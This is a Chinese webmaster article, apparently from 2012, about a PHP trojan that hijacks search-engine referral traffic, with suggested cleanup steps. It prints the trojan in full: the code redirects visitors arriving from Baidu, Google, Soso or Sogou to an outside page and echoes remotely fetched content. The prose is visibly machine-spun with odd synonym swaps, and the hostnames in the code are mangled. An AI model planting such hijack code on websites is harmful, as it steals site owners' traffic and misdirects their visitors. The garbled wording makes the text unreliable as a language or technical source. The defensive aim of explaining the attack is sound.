会员登录 | 会员注册 | 意见建议 | 网站地图

站长资源综合门户

当前位置:首页 > 站长学院 > 建站经验 > 关于致使搜索引擎来路流量转移的php木马介绍及提防

关于致使搜索引擎来路流量转移的php木马介绍及提防

时间:2012-02-20 14:33:08   作者:   来源:   点击:

如果你的网站平时流量很年夜,PV很高,某一天PV却起头变少,除开反思网站内容,还要斟酌下网站是否中木马,其实很早以前便有致使搜索引擎流量转移的php木马,简单来讲便是如果拜候流量来自搜索引擎,那么自动取得对方网站的文件,从而让你的网站不被用户看到。

因为我的网站近期遭受到这样的抨击打击,所以正好分享下这段代码,希望对广年夜站长有所启示,特别是对用php法度建站的站长,仍是应该提防下这类抨击打击。依照汗青的情况来看,这样的木马很多见,似乎一年前甚至几年前便有,只是可能现在取得的效果没曩昔那么好。

下面是致使搜索引擎来路流量转移的抨击打击代码:

<?php

error_reporting(E_ERROR);

header('content-Type: text/html; charset=gb2312');

$come_from="百度#谷歌#soso#sogou#cache.百度#谷歌";

$referer = Split("#",$come_from) ;

foreach($referer as $v){

if(stristr($_SERVER['HTTP_REFERER'],$v))

{

Header("Location:".'.abc/3/nb.html?'.$_SERVER['SERVER_NAME']);

}

}

echo file_get_contents('.abc//xx/dn2.php');

?>

代码很简单,如果拜候来历是搜索引擎,那么会定位到下面所述的php文件及html文件,这样用户便没法取得预想的东西。当然,现在每个办事器的依照设置不一样,部分办事器即便是被上传此类文件,仍是限制执行的;不过,既然遇到问题,那么接下来便是要解决问题。

下面简单说说我的措置体例,希望对年夜家以后遇到近似的情况有所帮忙。

第一步自然是删除近似的php的文件,这类php文件没有固定的名字,不过都是在根目录,所以查找起来很便利,删除失落那些陌生的文件便可。删除以后不要冲动,先去别的目录查找下近似的陌生文件,看到陌生的文件后打开看看,有问题直接删除。

第二步是继续去看常常使用的系统php文件,看看这些文件是否近期被修悔改,如果被修悔改,那么下载下来,随后查找前面呈现的陌生php文件名,比如原来是呈现的dv.php,现在可以搜索下dv.php,看看会不会被修改成这样;别的便是,一般别的目录下还会有真正的木马。

第三步可以去360网站平安检测平台看看,上传文件验证通过便可起头测试网站是否平安;一般而言,如果网站被挂黑链或有不偏见的文字,城市有提示,所以仍是比较好用的。特别是对黑链检测,这点功能比较好,因为黑链一般都是隐藏的,站长自己很难想到的。

第四步是修改弱口令,非论是FTP账号密码,仍是网站后台地址,仍是网站后台登录名,仍是别的什么密码,如果感觉太弱了,比如只有七八位,那么建议修改得更难一点,很多网站被破解,都是弱口令被扫描到,加年夜密码长度对这类破解网站的提防仍是有帮忙的。

写到这里,这个故事根基上告一段落了,网站平安迫在眉睫,每时每刻我们都应该注意网站的平安问题,你不注意,那些挂黑链的人可会惦记上你的,只有不竭提升网站的平安才可以尽可能避免被黑。本文由爱不网(.aibue)站长原创,转载分享请注明,谢谢合作!

分享到:

网友评论

热门建站经验